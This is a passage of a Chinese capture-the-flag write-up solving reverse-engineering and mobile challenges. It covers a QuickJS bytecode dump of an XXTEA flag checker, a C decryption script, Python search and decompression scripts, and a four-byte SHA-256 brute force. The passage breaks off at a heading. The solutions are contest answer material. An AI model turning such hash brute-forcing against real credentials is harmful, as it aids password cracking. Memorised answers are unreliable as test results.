fixup atom: args at 51, fixup atom: long2str at 59, fixup atom: str2long at 67, fixup atom: sdfsfsdf at 75, fixup atom: str2Hex at 83, fixup atom: hex2str at 91, fixup atom: xxxfss at 99, fixup atom: main at 105, fixup atom: args at 111, fixup atom: xxxfss at 116, fixup atom: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" at 122, fixup atom: _keyStr at 128, fixup atom: xxxfss at 136, fixup atom: dfsfs at 144, fixup atom: scriptArgs at 152, fixup atom: scriptArgs at 158, fixup atom: args at 164, fixup atom: args at 169, fixup atom: shift at 182, fixup atom: arguments at 190, fixup atom: arguments at 196, fixup atom: args at 204, fixup atom: error at 210, fixup atom: args at 216, fixup atom: main at 221, fixup atom: args } debug { 0306: de 03 01 13 f1 00 3e b0 01 58 00 05 36 00 09 40 35 3f 49 3f 3f 0d 41 filename: "./test_encode.js" } cpool { 031d: 0e function { 031e: 43 06 00 c2 03 02 03 02 09 00 01 6e 05 name: long2str args=2 vars=3 defargs=2 closures=0 cpool=1 stack=9 bclen=110 locals=5 vars { 032b: e0 03 00 01 00 name: v 0330: e2 03 00 01 00 name: w 0335: e4 03 00 00 00 name: vl 033a: e6 03 00 01 00 name: sl 033f: e8 03 00 02 00 name: i } bytecode { 0344: d1 e9 c9 d1 c5 b6 9e 47 bf 00 ad ca b5 cb c7 c5 a3 ea 3b d1 c7 71 38 99 00 00 00 42 f5 00 00 00 d1 c7 47 be ff 00 ad d1 c7 47 bd 08 a2 be ff 00 ad d1 c7 47 bd 10 a2 be ff 00 ad d1 c7 47 bd 18 a2 be ff 00 ad 24 04 00 49 93 02 ec c2 d2 ea 15 d1 42 5b 00 00 00 c1 24 01 00 42 f6 00 00 00 b5 c6 25 02 00 d1 42 5b 00 00 00 c1 25 01 00 at 23, fixup atom: String at 28, fixup atom: fromCharCode at 82, fixup atom: join at 91, fixup atom: substring at 102, fixup atom: join } debug { 03b2: de 03 01 0b 03 12 30 27 67 35 35 49 17 12 69 filename: "./test_encode.js" } cpool { 03c1: 06 float64 { 03c2: 00 00 e0 ff ff ff ef 41 4.29497e+09 } } ./test_encode.js:1: function: long2str args: v w locals: 0: var vl 1: var sl 2: var i stack_size: 9 opcodes: get_arg0 0: v get_length put_loc0 0: vl get_arg0 0: v get_loc0 0: vl push_1 1 sub get_array_el push_const8 0: 4294967295 and put_loc1 1: sl push_0 0 put_loc2 2: i 14: get_loc2 2: i get_loc0 0: vl lt if_false8 77 get_arg0 0: v get_loc2 2: i to_propkey2 get_var String get_field2 fromCharCode get_arg0 0: v get_loc2 2: i get_array_el push_i16 255 and get_arg0 0: v get_loc2 2: i get_array_el push_i8 8 shr push_i16 255 and get_arg0 0: v get_loc2 2: i get_array_el push_i8 16 shr push_i16 255 and get_arg0 0: v get_loc2 2: i get_array_el push_i8 24 shr push_i16 255 and call_method 4 put_array_el inc_loc 2: i goto8 14 77: get_arg1 1: w if_false8 100 get_arg0 0: v get_field2 join push_empty_string call_method 1 get_field2 substring push_0 0 get_loc1 1: sl tail_call_method 2 100: get_arg0 0: v get_field2 join push_empty_string tail_call_method 1 } 03ca: 0e function { 03cb: 43 06 00 c4 03 02 03 02 07 00 00 5d 05 name: str2long args=2 vars=3 defargs=2 closures=0 cpool=0 stack=7 bclen=93 locals=5 vars { 03d8: ee 03 00 01 00 name: s 03dd: e2 03 00 01 00 name: w 03e2: f0 03 00 00 00 name: len 03e7: e0 03 00 01 00 name: v 03ec: e8 03 00 02 00 name: i } bytecode { 03f1: d1 e9 c9 26 00 00 ca b5 cb c7 c5 a3 ea 46 c6 c7 b7 a1 71 d1 42 f9 00 00 00 c7 24 01 00 d1 42 f9 00 00 00 c7 b6 9d 24 01 00 bd 08 a0 af d1 42 f9 00 00 00 c7 b7 9d 24 01 00 bd 10 a0 af d1 42 f9 00 00 00 c7 b8 9d 24 01 00 bd 18 a0 af 49 b9 94 02 ec b7 d2 ea 06 c6 c6 e9 c5 49 c6 28 at 21, fixup atom: charCodeAt at 31, fixup atom: charCodeAt at 47, fixup atom: charCodeAt at 63, fixup atom: charCodeAt } debug { 044e: de 03 13 0b 03 12 17 27 4e 53 53 58 1c 12 1d filename: "./test_encode.js" } ./test_encode.js:19: function: str2long args: s w locals: 0: var len 1: var v 2: var i stack_size: 7 opcodes: get_arg0 0: s get_length put_loc0 0: len array_from 0 put_loc1 1: v push_0 0 put_loc2 2: i 9: get_loc2 2: i get_loc0 0: len lt if_false8 83 get_loc1 1: v get_loc2 2: i push_2 2 sar to_propkey2 get_arg0 0: s get_field2 charCodeAt get_loc2 2: i call_method 1 get_arg0 0: s get_field2 charCodeAt get_loc2 2: i push_1 1 add call_method 1 push_i8 8 shl or get_arg0 0: s get_field2 charCodeAt get_loc2 2: i push_2 2 add call_method 1 push_i8 16 shl or get_arg0 0: s get_field2 charCodeAt get_loc2 2: i push_3 3 add call_method 1 push_i8 24 shl or put_array_el push_4 4 add_loc 2: i goto8 9 83: get_arg1 1: w if_false8 91 get_loc1 1: v get_loc1 1: v get_length get_loc0 0: len put_array_el 91: get_loc1 1: v return } 045d: 0e function { 045e: 43 06 00 c6 03 02 0b 02 06 00 04 f8 01 0d name: sdfsfsdf args=2 vars=11 defargs=2 closures=0 cpool=4 stack=6 bclen=248 locals=13 vars { 046c: f4 03 00 01 00 name: str 0471: f6 03 00 01 00 name: key 0476: e0 03 00 00 00 name: v 047b: f8 03 00 01 00 name: k 0480: fa 03 00 02 00 name: n 0485: fc 03 00 03 00 name: z 048a: fe 03 00 04 00 name: y 048f: 80 04 00 05 00 name: delta 0494: 82 04 00 06 00 name: mx 0499: 84 04 00 07 00 name: e 049e: 86 04 00 08 00 name: q 04a3: 88 04 00 09 00 name: sum 04a8: 8a 04 00 0a 00 name: p } bytecode { 04ad: d1 c1 a9 ea 03 c1 28 38 e2 00 00 00 d1 0a f0 c9 38 e2 00 00 00 d2 09 f0 ca c5 e9 b6 9e cb c5 c7 47 cc c5 b5 47 c3 04 bf 00 c3 05 38 9d 00 00 00 42 06 01 00 00 bb bd 34 c7 b6 9d 9b 9d 24 01 00 c3 08 b5 c3 09 c2 08 90 c3 08 b5 a5 69 9b 00 00 00 c2 09 c2 05 9d bf 01 ad c4 09 b7 a2 b8 ad c3 07 b5 c3 0a c2 0a c7 a3 ea 43 c5 c2 0a b6 9d 47 c3 04 c8 ba a2 c2 04 b7 a0 ae c2 04 b8 a2 c8 b9 a0 ae 9d c2 09 c2 04 ae c6 c2 0a b8 ad c2 07 ae 47 c8 ae 9d ae c3 06 c5 c2 0a 71 c5 c2 0a 47 c2 06 9d bf 02 ad 16 49 cc 93 0a ec b9 c5 b5 47 c3 04 c8 ba a2 c2 04 b7 a0 ae c2 04 b8 a2 c8 b9 a0 ae 9d c2 09 c2 04 ae c6 c2 0a b8 ad c2 07 ae 47 c8 ae 9d ae c3 06 c5 c7 71 c5 c7 47 c2 06 9d bf 03 ad 16 49 cc ed 5f ff 38 e4 00 00 00 38 e1 00 00 00 c5 09 f0 23 01 00 at 8, fixup atom: str2long at 17, fixup atom: str2long at 44, fixup atom: Math at 49, fixup atom: floor at 233, fixup atom: str2Hex at 238, fixup atom: long2str } debug { 05a5: de 03 23 15 03 1c 08 08 30 30 1d 44 85 3f 35 21 30 2b bc 58 17 1c bc 4e 13 filename: "./test_encode.js" } cpool { 05be: 06 float64 { 05bf: 00 00 20 37 ef c6 e3 41 2.65444e+09 } 05c7: 06 float64 { 05c8: 00 00 e0 ff ff ff ef 41 4.29497e+09 } 05d0: 06 float64 { 05d1: 00 00 e0 ff ff ff ef 41 4.29497e+09 } 05d9: 06 float64 { 05da: 00 00 e0 ff ff ff ef 41 4.29497e+09 } } ./test_encode.js:35: function: sdfsfsdf args: str key locals: 0: var v 1: var k 2: var n 3: var z 4: var y 5: var delta 6: var mx 7: var e 8: var q 9: var sum 10: var p stack_size: 6 opcodes: get_arg0 0: str push_empty_string eq if_false8 7 push_empty_string return 7: get_var str2long get_arg0 0: str push_true call2 2 put_loc0 0: v get_var str2long get_arg1 1: key push_false call2 2 put_loc1 1: k get_loc0 0: v get_length push_1 1 sub put_loc2 2: n get_loc0 0: v get_loc2 2: n get_array_el put_loc3 3: z get_loc0 0: v push_0 0 get_array_el put_loc8 4: y push_const8 0: 2654435769 put_loc8 5: delta get_var Math get_field2 floor push_6 6 push_i8 52 get_loc2 2: n push_1 1 add div add call_method 1 put_loc8 8: q push_0 0 put_loc8 9: sum 69: get_loc8 8: q post_dec put_loc8 8: q push_0 0 gt if_false 232 get_loc8 9: sum get_loc8 5: delta add push_const8 1: 4294967295 and set_loc8 9: sum push_2 2 shr push_3 3 and put_loc8 7: e push_0 0 put_loc8 10: p 100: get_loc8 10: p get_loc2 2: n lt if_false8 172 get_loc0 0: v get_loc8 10: p push_1 1 add get_array_el put_loc8 4: y get_loc3 3: z push_5 5 shr get_loc8 4: y push_2 2 shl xor get_loc8 4: y push_3 3 shr get_loc3 3: z push_4 4 shl xor add get_loc8 9: sum get_loc8 4: y xor get_loc1 1: k get_loc8 10: p push_3 3 and get_loc8 7: e xor get_array_el get_loc3 3: z xor add xor put_loc8 6: mx get_loc0 0: v get_loc8 10: p to_propkey2 get_loc0 0: v get_loc8 10: p get_array_el get_loc8 6: mx add push_const8 2: 4294967295 and insert3 put_array_el put_loc3 3: z inc_loc 10: p goto8 100 172: get_loc0 0: v push_0 0 get_array_el put_loc8 4: y get_loc3 3: z push_5 5 shr get_loc8 4: y push_2 2 shl xor get_loc8 4: y push_3 3 shr get_loc3 3: z push_4 4 shl xor add get_loc8 9: sum get_loc8 4: y xor get_loc1 1: k get_loc8 10: p push_3 3 and get_loc8 7: e xor get_array_el get_loc3 3: z xor add xor put_loc8 6: mx get_loc0 0: v get_loc2 2: n to_propkey2 get_loc0 0: v get_loc2 2: n get_array_el get_loc8 6: mx add push_const8 3: 4294967295 and insert3 put_array_el put_loc3 3: z goto16 69 232: get_var str2Hex get_var long2str get_loc0 0: v push_false call2 2 tail_call 1 } 05e2: 0e function { 05e3: 43 06 00 c8 03 01 03 01 04 00 01 32 04 name: str2Hex args=1 vars=3 defargs=1 closures=0 cpool=1 stack=4 bclen=50 locals=4 vars { 05f0: b0 01 00 01 00 name: input 05f5: 8e 04 00 00 00 name: output 05fa: 90 04 00 01 00 name: chr1 05ff: e8 03 00 02 00 name: i } bytecode { 0604: c1 c9 c1 ca b5 cb d1 42 f9 00 00 00 c7 91 cb 24 01 00 42 37 00 00 00 bd 10 24 01 00 ce e9 b6 a9 ea 06 bf 00 c6 9d ca c6 94 00 c7 d1 e9 a3 eb d7 c5 28 at 8, fixup atom: charCodeAt at 19, fixup atom: toString } debug { 0636: de 03 3e 08 03 0d 0d 0e 76 35 12 21 filename: "./test_encode.js" } cpool { 0642: 07 string { 1"0" 0643: 02 30 } } ./test_encode.js:62: function: str2Hex args: input locals: 0: var output 1: var chr1 2: var i stack_size: 4 opcodes: push_empty_string put_loc0 0: output push_empty_string put_loc1 1: chr1 push_0 0 put_loc2 2: i 6: get_arg0 0: input get_field2 charCodeAt get_loc2 2: i post_inc put_loc2 2: i call_method 1 get_field2 toString push_i8 16 call_method 1 set_loc1 1: chr1 get_length push_1 1 eq if_false8 39 push_const8 0: 1"0" get_loc1 1: chr1 add put_loc1 1: chr1 39: get_loc1 1: chr1 add_loc 0: output get_loc2 2: i get_arg0 0: input get_length lt if_true8 6 get_loc0 0: output return } 0645: 0e function { 0646: 43 06 00 ca 03 01 03 01 06 00 00 52 04 name: hex2str args=1 vars=3 defargs=1 closures=0 cpool=0 stack=6 bclen=82 locals=4 vars { 0653: b0 01 00 01 00 name: input 0658: 8e 04 00 00 00 name: output 065d: e8 03 00 01 00 name: i 0662: f8 03 00 02 00 name: k } bytecode { 0667: c1 c9 b5 ca c6 d1 e9 a3 ea 47 38 09 01 00 00 d1 42 0a 01 00 00 c6 b6 24 02 00 bd 10 f0 b9 a0 38 09 01 00 00 d1 42 0a 01 00 00 c6 8f ce b6 24 02 00 bd 10 f0 af cf be ff 00 ad cb c5 38 99 00 00 00 42 f5 00 00 00 c7 24 01 00 9d c9 93 01 ec b5 c5 28 at 11, fixup atom: parseInt at 17, fixup atom: substr at 32, fixup atom: parseInt at 38, fixup atom: substr at 61, fixup atom: String at 66, fixup atom: fromCharCode } debug { 06b9: de 03 4a 09 03 0d 0d 21 da 21 58 0d 0d filename: "./test_encode.js" } ./test_encode.js:74: function: hex2str args: input locals: 0: var output 1: var i 2: var k stack_size: 6 opcodes: push_empty_string put_loc0 0: output push_0 0 put_loc1 1: i 4: get_loc1 1: i get_arg0 0: input get_length lt if_false8 80 get_var parseInt get_arg0 0: input get_field2 substr get_loc1 1: i push_1 1 call_method 2 push_i8 16 call2 2 push_4 4 shl get_var parseInt get_arg0 0: input get_field2 substr get_loc1 1: i inc set_loc1 1: i push_1 1 call_method 2 push_i8 16 call2 2 or set_loc2 2: k push_i16 255 and put_loc2 2: k get_loc0 0: output get_var String get_field2 fromCharCode get_loc2 2: k call_method 1 add put_loc0 0: output inc_loc 1: i goto8 4 80: get_loc0 0: output return } 06c6: 0e function { 06c7: 43 06 00 cc 03 00 00 00 00 00 00 01 00 name: xxxfss args=0 vars=0 defargs=0 closures=0 cpool=0 stack=0 bclen=1 locals=0 bytecode { 06d4: 29 } debug { 06d5: de 03 56 01 03 filename: "./test_encode.js" } ./test_encode.js:86: function: xxxfss stack_size: 0 opcodes: return_undef } 06da: 0e function { 06db: 43 06 00 00 01 09 01 04 00 00 e6 01 0a name: "<null>" args=1 vars=9 defargs=1 closures=0 cpool=0 stack=4 bclen=230 locals=10 vars { 06e8: b0 01 00 01 00 name: input 06ed: 8e 04 00 00 00 name: output 06f2: 90 04 00 01 00 name: chr1 06f7: 96 04 00 02 00 name: chr2 06fc: 98 04 00 03 00 name: chr3 0701: 9a 04 00 04 00 name: enc1 0706: 9c 04 00 05 00 name: enc2 070b: 9e 04 00 06 00 name: enc3 0710: a0 04 00 07 00 name: enc4 0715: e8 03 00 08 00 name: i } bytecode { 071a: c1 c9 c1 cc c1 c3 07 b5 c3 08 d1 42 f9 00 00 00 c2 08 91 c3 08 24 01 00 ca d1 42 f9 00 00 00 c2 08 91 c3 08 24 01 00 cb d1 42 f9 00 00 00 c2 08 91 c3 08 24 01 00 cc c6 b7 a1 c3 04 c6 b8 ad b9 a0 c7 b9 a1 af c3 05 c7 bd 0f ad b7 a0 c8 bb a1 af c3 06 c8 bd 3f ad c3 07 38 11 01 00 00 c7 ef ea 09 bd 40 c4 07 c3 06 ec 0e 38 11 01 00 00 c8 ef ea 05 bd 40 c3 07 c5 38 e6 00 00 00 41 ea 00 00 00 42 12 01 00 00 c2 04 24 01 00 9d 38 e6 00 00 00 41 ea 00 00 00 42 12 01 00 00 c2 05 24 01 00 9d 38 e6 00 00 00 41 ea 00 00 00 42 12 01 00 00 c2 06 24 01 00 9d 38 e6 00 00 00 41 ea 00 00 00 42 12 01 00 00 c2 07 24 01 00 9d c9 c1 d0 cf ca c1 c4 07 c4 06 c4 05 c3 04 c2 08 d1 e9 a3 6a 2a ff ff ff c5 28 at 12, fixup atom: charCodeAt at 27, fixup atom: charCodeAt at 42, fixup atom: charCodeAt at 90, fixup atom: isNaN at 107, fixup atom: isNaN at 121, fixup atom: xxxfss at 126, fixup atom: _keyStr at 131, fixup atom: charAt at 142, fixup atom: xxxfss at 147, fixup atom: _keyStr at 152, fixup atom: charAt at 163, fixup atom: xxxfss at 168, fixup atom: _keyStr at 173, fixup atom: charAt at 184, fixup atom: xxxfss at 189, fixup atom: _keyStr at 194, fixup atom: charAt } debug { 0800: de 03 59 18 03 0d 0d 12 13 4e 4e 4e 1c 3a 3f 21 30 21 3a 18 08 6c 6c 6c 71 17 30 35 filename: "./test_encode.js" } ./test_encode.js:89: function: <null> args: input locals: 0: var output 1: var chr1 2: var chr2 3: var chr3 4: var enc1 5: var enc2 6: var enc3 7: var enc4 8: var i stack_size: 4 opcodes: push_empty_string put_loc0 0: output push_empty_string put_loc3 3: chr3 push_empty_string put_loc8 7: enc4 push_0 0 put_loc8 8: i 10: get_arg0 0: input get_field2 charCodeAt get_loc8 8: i post_inc put_loc8 8: i call_method 1 put_loc1 1: chr1 get_arg0 0: input get_field2 charCodeAt get_loc8 8: i post_inc put_loc8 8: i call_method 1 put_loc2 2: chr2 get_arg0 0: input get_field2 charCodeAt get_loc8 8: i post_inc put_loc8 8: i call_method 1 put_loc3 3: chr3 get_loc1 1: chr1 push_2 2 sar put_loc8 4: enc1 get_loc1 1: chr1 push_3 3 and push_4 4 shl get_loc2 2: chr2 push_4 4 sar or put_loc8 5: enc2 get_loc2 2: chr2 push_i8 15 and push_2 2 shl get_loc3 3: chr3 push_6 6 sar or put_loc8 6: enc3 get_loc3 3: chr3 push_i8 63 and put_loc8 7: enc4 get_var isNaN get_loc2 2: chr2 call1 1 if_false8 106 push_i8 64 set_loc8 7: enc4 put_loc8 6: enc3 goto8 119 106: get_var isNaN get_loc3 3: chr3 call1 1 if_false8 119 push_i8 64 put_loc8 7: enc4 119: get_loc0 0: output get_var xxxfss get_field _keyStr get_field2 charAt get_loc8 4: enc1 call_method 1 add get_var xxxfss get_field _keyStr get_field2 charAt get_loc8 5: enc2 call_method 1 add get_var xxxfss get_field _keyStr get_field2 charAt get_loc8 6: enc3 call_method 1 add get_var xxxfss get_field _keyStr get_field2 charAt get_loc8 7: enc4 call_method 1 add put_loc0 0: output push_empty_string set_loc3 3: chr3 set_loc2 2: chr2 put_loc1 1: chr1 push_empty_string set_loc8 7: enc4 set_loc8 6: enc3 set_loc8 5: enc2 put_loc8 4: enc1 get_loc8 8: i get_arg0 0: input get_length lt if_true 10 get_loc0 0: output return } 081c: 0e function { 081d: 43 06 00 ce 03 01 04 01 04 00 00 84 01 05 name: main args=1 vars=4 defargs=1 closures=0 cpool=0 stack=4 bclen=132 locals=5 vars { 082b: d0 03 00 01 00 name: args 0830: b0 01 00 00 00 name: input 0835: a6 04 00 01 00 name: dfsfdsfsd 083a: a8 04 00 02 00 name: fwderf 083f: ac 01 00 03 00 name: target } bytecode { 0844: d1 e9 b6 a3 ea 0d 38 15 01 00 00 04 ee 00 00 00 ef 29 38 15 01 00 00 04 16 01 00 00 d1 b5 47 9d ef 0e d1 b5 47 c9 38 e6 00 00 00 42 eb 00 00 00 c5 24 01 00 ca 04 17 01 00 00 11 39 18 01 00 00 0e 38 e3 00 00 00 c6 38 18 01 00 00 f0 cf e9 bd 70 aa ea 0d 38 15 01 00 00 04 ee 00 00 00 ef 29 04 19 01 00 00 cc c7 c8 a9 ea 0e 38 15 01 00 00 04 1a 01 00 00 ef 0e 29 38 15 01 00 00 04 ee 00 00 00 ef 29 at 7, fixup atom: print at 12, fixup atom: error at 19, fixup atom: print at 24, fixup atom: "your input: " at 39, fixup atom: xxxfss at 44, fixup atom: dfsfs at 54, fixup atom: no_thing_is_true at 60, fixup atom: dfdfwf3 at 66, fixup atom: sdfsfsdf at 72, fixup atom: dfdfwf3 at 85, fixup atom: print at 90, fixup atom: error at 97, fixup atom: "05aed0ce441f80b5bc36af4c698509fc6cc3c97146353de5a95c6abea07fd4a7070932d86ac32d628672a59123e5972331db5dffe7057362" at 108, fixup atom: print at 113, fixup atom: yes at 121, fixup atom: print at 126, fixup atom: error } debug { 08c8: de 03 76 11 03 21 3b 08 54 17 4f 3f 40 26 3b 09 21 1d 3f 09 3c filename: "./test_encode.js" } ./test_encode.js:118: function: main args: args locals: 0: var input 1: var dfsfdsfsd 2: var fwderf 3: var target stack_size: 4 opcodes: get_arg0 0: args get_length push_1 1 lt if_false8 18 get_var print push_atom_value error call1 1 return_undef 18: get_var print push_atom_value "your input: " get_arg0 0: args push_0 0 get_array_el add call1 1 drop get_arg0 0: args push_0 0 get_array_el put_loc0 0: input get_var xxxfss get_field2 dfsfs get_loc0 0: input call_method 1 put_loc1 1: dfsfdsfsd push_atom_value no_thing_is_true dup put_var dfdfwf3 drop get_var sdfsfsdf get_loc1 1: dfsfdsfsd get_var dfdfwf3 call2 2 set_loc2 2: fwderf get_length push_i8 112 neq if_false8 96 get_var print push_atom_value error call1 1 return_undef 96: push_atom_value "05aed0ce441f80b5bc36af4c698509fc6cc3c97146353de5a95c6abea07fd4a7070932d86ac32d628672a59123e5972331db5dffe7057362" put_loc3 3: target get_loc2 2: fwderf get_loc3 3: target eq if_false8 120 get_var print push_atom_value yes call1 1 drop return_undef 120: get_var print push_atom_value error call1 1 return_undef } } ./test_encode.js:1: function: <eval> locals: 0: var <ret> stack_size: 3 opcodes: check_define_var long2str,64 check_define_var str2long,64 check_define_var sdfsfsdf,64 check_define_var str2Hex,64 check_define_var hex2str,64 check_define_var xxxfss,64 check_define_var main,64 check_define_var args,0 fclosure8 0: [bytecode long2str] define_func long2str,0 fclosure8 1: [bytecode str2long] define_func str2long,0 fclosure8 2: [bytecode sdfsfsdf] define_func sdfsfsdf,0 fclosure8 3: [bytecode str2Hex] define_func str2Hex,0 fclosure8 4: [bytecode hex2str] define_func hex2str,0 fclosure8 5: [bytecode xxxfss] define_func xxxfss,0 fclosure8 7: [bytecode main] define_func main,0 define_var args,0 get_var xxxfss push_atom_value "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" insert2 put_field _keyStr put_loc0 0: "<ret>" get_var xxxfss fclosure8 6: [bytecode <null>] insert2 put_field dfsfs put_loc0 0: "<ret>" undefined put_loc0 0: "<ret>" get_var_undef scriptArgs typeof_is_undefined if_true8 179 get_var scriptArgs dup put_var args put_loc0 0: "<ret>" get_var args get_field2 shift call_method 0 put_loc0 0: "<ret>" goto8 215 179: undefined put_loc0 0: "<ret>" get_var_undef arguments typeof_is_undefined if_true8 203 get_var arguments dup put_var args put_loc0 0: "<ret>" goto8 215 203: push_atom_value error dup put_var args put_loc0 0: "<ret>" 215: get_var main get_var args call1 1 set_loc0 0: "<ret>" return } error
一共有这些函数
eval、long2str、str2long、sdfsfsdf、str2Hex、hex2str、xxxfss、<null>、main
接下来分析各个函数的功能
sdfsfsdf:
应该为tea系列
然后key为 no_thing_is_true
直接上脚本
#include <stdio.h> #include <stdlib.h> #define DELTA 0x9e3779b9//0x61C88647 int main() { char v1[] = { 0x05,0xae,0xd0,0xce, 0x44,0x1f,0x80,0xb5, 0xbc,0x36,0xaf,0x4c, 0x69,0x85,0x09,0xfc, 0x6c,0xc3,0xc9,0x71, 0x46,0x35,0x3d,0xe5, 0xa9,0x5c,0x6a,0xbe, 0xa0,0x7f,0xd4,0xa7, 0x07,0x09,0x32,0xd8, 0x6a,0xc3,0x2d,0x62, 0x86,0x72,0xa5,0x91, 0x23,0xe5,0x97,0x23, 0x31,0xdb,0x5d,0xff, 0xe7,0x05,0x73,0x62 }; char key1[] = "no_thing_is_true";//0x6e6f5f74,0x68696e67,0x5f69735f,0x74727565 unsigned int sum = 0; unsigned int y, z, p, rounds, e; int n = 14; // unsigned int* v = (unsigned int*)v1; unsigned int* key = (unsigned int*)key1; int i = 0; rounds = 6 + 52 / n; y = v[0]; sum = (rounds * DELTA) & 0xffffffff; do //0x9E3779B9*(52/35)-0x4AB325AA,测试来要循环7次 { e = sum >> 2 & 3; for (p = n - 1; p > 0; p--) //34次循环 { z = v[p - 1]; v[p] = (v[p] - ((((z >> 5) ^ (y << 2)) + ((y >> 3) ^ (z << 4))) ^ ((key[(p ^ e) & 3] ^ z) + (y ^ sum)))) & 0xffffffff; y = v[p]; } z = v[n - 1]; v[0] = (v[0] - (((key[(p ^ e) & 3] ^ z) + (y ^ sum)) ^ (((y << 2) ^ (z >> 5)) + ((z << 4) ^ (y >> 3))))) & 0xffffffff; y = v[0]; sum = (sum - DELTA) & 0xffffffff; } while (--rounds); for (i = 0; i < 56; i++) { printf("%c", v1[i]); } printf("\n\n"); return 0; }
解密得到
之后base直接转得到flag
2、marmagic
前面的vm都没用
import itertools import string from zio import * s = [0x2FA4B4E6, 0x3AA763C7, 0x67057097, 0x155D753, 0x423159C0, 0x9F54FA00, 0x8AAAFCD, 0xE468BB71, 0x4CCCFB83] s += [0xB8F2D37F, 0x19794181, 0x993737EE, 0x749C7985, 0x5A9734C3, 0xEA59355A, 0xC73E3987, 0x22EB465B, 0x8B50A4CF] s += [0x3A661CBD, 0x5578F063, 0x76D83FC5, 0x699EA4A7, 0xCA324955, 0xC6A8998D, 0xFA2A09D2, 0x158673D9, 0x66CE0371] s += [0xD22BC207, 0x4000F0AC, 0x24C4BA66, 0x8523EA8A, 0x66D95F75, 0x988ADF8A, 0x76F57D90, 0x42BA7FCF, 0x22FF7C2F] s += [0xC5919DF, 0x10271DCA, 0xBE0AABA8, 0xF3001CAD, 0x3D9BFB3D, 0xBCEC5E4D, 0x10D780AC, 0x9537CA60, 0x9F024F5D] s += [0x472ECBDF, 0x20DB1A28, 0xA8FD9C14, 0x2A5800F0, 0xE1B8C757, 0x5AA73EE9, 0xEF262FE2, 0x2341E61E, 0x4F8B4C24] cmps = [0x99C57520, 0x177E3A5A, 0x717D831F, 0x69A5977F, 0x8CAF8A2D, 0x23B374E2, 0x8062C165, 0xEFE98B3F, 0x6CE0568A, 0xAAB6B3F, 0x45057390, 0x2EA6430] mydict = {} for p in itertools.combinations(s, 5): sum = (p[0] + p[1] + p[2] + p[3] + p[4])&0xffffffff if sum in cmps: print ('p=%s, sum=%x' %(p, sum)) mydict[sum] = p k = 0 s1 = list(mydict[cmps[2*k]]) s2 = list(mydict[cmps[2*k+1]]) v = list(set(s1).intersection(set(s2)))[0] s1.remove(v) s2.remove(v) if k == 1: s3 = [0x79C1E7FF, 0x3092311F, 0x379526BD, 0xA776EEFC, 0xFCA2C92C, 0x20000000, 0x2FD60000, 0xE2B81F5A, 0x476EE8A2] elif k == 2: s3 = [0x58D1FFFF, 0x5B7F0D80, 0xEC3A938F, 0xCCBAB640, 0x3EA60422, 0x3F80589B, 0x436C57F8, 0xA2A000C0, 0x2E86F33C] elif k == 0: s3 = [0x7E1F777C, 0x81550ED6, 0x61D70225, 0x10602644, 0x05CD4A40, 0xC0120000, 0xF8214B14, 0x77000000, 0x5953BBF0] elif k == 3: s3 = [0x02A20833, 0x37FFFEED, 0x83220421, 0x2B8A0884, 0xF1719016, 0x552BC509, 0xCB104A8D, 0xBD4B0696, 0x47B945F8] elif k == 4: s3 = [0x32C600E7, 0x588001F3, 0x24224983, 0x3C804776, 0xA07004E0, 0x0C079035, 0xCCA4D614, 0x4780C084, 0x537A407F] elif k == 5: s3 = [0x81BFE181, 0x544F470A, 0x728880C0, 0xD613137B, 0x86970C9F, 0xE1000000, 0x9CA8076B, 0xDA10007D, 0x03062EB2] for p1 in itertools.permutations(s1): for p2 in itertools.permutations(s2): d = [p1[0], p2[0], p1[1], p2[1], v, p2[2], p1[2], p2[3], p1[3]] sum = 0 for i in range(9): sum += d[i]*s3[i] sum = sum&0xffffffff c = l32(sum) is_printable = True for j in range(4): if c[j] not in string.printable: is_printable = False if is_printable: print ('d=%s, c=%s' %(d, c))
3、showyourflag
本题有幸拿到唯一一血 😸
from zio import * with open('./yourflag', 'rb') as f: d = f.read() def handle_one(d, d2, idx): common_len = 0 while True: if idx >= (len(d)): break size = l8(d[idx]) print ('idx=%x, size=%x, idx2=%x' %(idx, size, len(d2))) if size == 0x1f: d2 += d[idx+1:idx+0x21] idx += 0x21 elif size < 0x1f: d2 += d[idx+1:idx+2+size] idx += size + 2 elif (size >= 0x20)&(size < 0xe0): common_len += (size>>5)+2 distance = ((size&0x1f)<<8) + l8(d[idx+1]) + 1 s = d2[-distance:] while len(s) < common_len: s += d2[-distance:] s = s[:common_len] print ('common_len=%x, distance=%x, data=%s' %(common_len, distance, s.encode('hex'))) d2 += s common_len = 0 idx += 2 elif (size >= 0xe0): size2 = l8(d[idx+1]) if size2 == 0xfd: common_len += 262 idx += 3 else: common_len += size2 + 2 + 7 distance = (((size+32)&0xff) << 8) + l8(d[idx + 2]) + 1 s = d2[-distance:] while len(s) < common_len: s += d2[-distance:] s = s[:common_len] print ('common_len=%x, distance=%x, data=%s' % (common_len, distance, s.encode('hex'))) d2 += s common_len = 0 idx += 3 return idx, d2 idx = 0 d2 = '' idx, d2 = handle_one(d, d2, idx) d3 = '' for i in range(len(d2)): c = (0xff-ord(d2[i])) c = ((c>>1)+(c<<7))&0xff d3 += chr(c) with open('flag3.png', 'wb') as f: f.write(d3)
Mobile
1、HaHaHaHa
先计算出各个hash加密的顺序:
from hashlib import * import hashlib op = [0xAF, 0xA1, 0xA4, 170, 0xA5, 0xAE, 0xA0, 0xA3] for i in range(len(op)): op[i] ^= 0xAB for i in range(len(op)): if (op[i] >> 3) & 1: print('SHA-512') elif (op[i]&7) == 0: print('MD2') elif (op[i]&7) == 1: print('MD5') elif (op[i]&7) == 2: print('SHA-1') elif (op[i]&7) == 3: print('SHA-224') elif (op[i]&7) == 4: print('SHA-256') elif (op[i]&7) == 5: print('SHA-384')
得到加密顺序为
SHA-256
HmacSha512
HmacSha512
MD5
HmacSha512
SHA-384
HmacSha512
HmacSha512
之后逐个爆破
SHA-256:
from hashlib import * import hmac key = 0 for i in range(0x20,0x7f): for j in range(0x20,0x7f): for k in range(0x20,0x7f): for l in range(0x20,0x7f): tmp = bytes([i, j, k, l]) if sha256(tmp).hexdigest()[:16] == 'fc7466e55fbf37b1': print(tmp)
Sha512:
